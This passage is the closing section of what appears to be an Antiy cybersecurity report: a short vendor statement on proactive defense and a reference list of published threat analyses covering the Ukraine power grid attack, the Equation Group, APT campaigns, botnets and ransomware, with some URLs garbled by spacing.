Based on its independently developed core technologies and products for threat detection and defense, Antiy promotes the effective integration of proactive defense, threat intelligence and architectural security, and passive defense. It is committed to providing attackers with unpredictable security capabilities at points where attacks are difficult to bypass, thereby achieving effective protection and highly automated and operable security business value. This will be the path Antiy has chosen for the future.
Being a capable vendor is difficult; achieving genuine customer value is even more challenging. “Where the path is flat and near, many will travel; where the path is rugged and far, few will arrive”. Our understanding of cybersecurity dictates that we must always choose to climb the steepest slopes and tread the most thorny paths. This has been true in the past, and it will be true in the future.
8. Appendix 1: References
[1] Antiy: Comprehensive Analysis Report on the Attack on Ukraine’s Power System
[2] SANS ICS Series Reports on the Power Outage in Ukraine
https://ics.sans.org/blog/2015/12/30/current-reporting-on-the-cyber-attack-in-ukraine-resulting-in-power-o utag e
https://ics.sans.org/blog/2016/01/01/potentialsampleofmalwarefromtheukrainiancyberattackuncovered
https://ics.sans.org/blog/2016/01/09/confirmationofacoordinatedattackontheukrainianpowergrid
https://ics.sans.org/media/EISAC_SANS_Ukraine_DUC_5.pdf
[3] ESET’s series of reports on the power outage in Ukraine
https://ics.sans.org/blog/2016/03/22/eisacandsansreportontheukrainiangridattack
https://www.welivesecurity.com/2016/01/11/blackenergyandtheukrainianpoweroutagewhatwereallyknow/
[4] Antiy: The White Elephant’s Dance: Cyberattacks from the Indian Subcontinent
https://www.antiy.com/response/WhiteElephant/WhiteElephant.html
[5] Antiy: From “Equation” to “Equation Group”—An Analysis of the Cross-Platform Capabilities of the EQUATION Hacking Group’s Advanced Malware
https://www.antiy.com/response/EQUATIONS/EQUATIONS.html
[6] Antiy: A Trojan That Modifies Hard Drive Firmware: Exploring the Attack Components of the EQUATION Group
https://www.antiy.com/response/EQUATION_ANTIY_REPORT.html
[7] Antiy: Analysis of Encryption Techniques in Some Components of the Equation
[8] Kaspersky : Equation: The Death Star of Malware Galaxy
http://securelist.com/blog/research/68750/equationthedeathstarofmalwaregalaxy/
[9] Kaspersky : A Fanny Equation: “I am your father, Stuxnet”
http://securelist.com/blog/research/68787/afannyequationiamyourfatherstuxnet/
[10] Kaspersky : Equation Group: from Houston with love
http://securelist.com/blog/research/68877/equationgroupfromhoustonwithlove/
[11] Kaspersky : Equation_group_questions_and_answers
https://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf
[12] An Easy Win : Using SIGINT to Learn about New Viruses
https://freesnowden.is/wpcontent/uploads/2015/06/projectcamberdada.pdf
[13] Antiy: Analysis of a Sample Used in a Quasi-APT Attack Targeting Chinese Organizations
https://www.antiy.com/response/APTTOCS.html
[14] 360: OceanLotus APT Report
http://bobao.360.cn/news/detail/1601.html
[15] US CERT: Grizzly Steppe
[16] nextwaveofransomwarecoulddemandmillions
https://venturebeat.com/2016/03/26/next wave of ransomware could demand millions/
[17] Antiy Technical Articles Compilation (Vol. 4, No. 3): Hot Topics Edition (Special Feature on “Ransomware”)
[18] Antiy: A Review and Outlook of Cybersecurity Threats in 2015
https://www.antiy.com/response/2015_Antiy_Annual_Security_Report.html
[19] Antiy: Analysis of Zombie Crowds in DDoS Attack Organizations
https://www.antiy.com/response/Chicken_Mutex_MM.html
[20] Antiy: IoT Botnets Seriously Threaten Network Infrastructure Security
https://www.antiy.com/response/Mirai/Mirai.html
[21] Kaspersky: Duqu 2.0 misappropriates Foxconn certificates
https://securelist.com/blog/research/70641/theduqu20persistencemodule/
[22] Escaping the Territory of Worms and Trojans: The Causes of Traditional Anti-Malicious Code Methods and the Limitations of APT Countermeasures
https://www.antiy.com/resources/Methodology_AVER_Introspection_Trilogy_II.pdf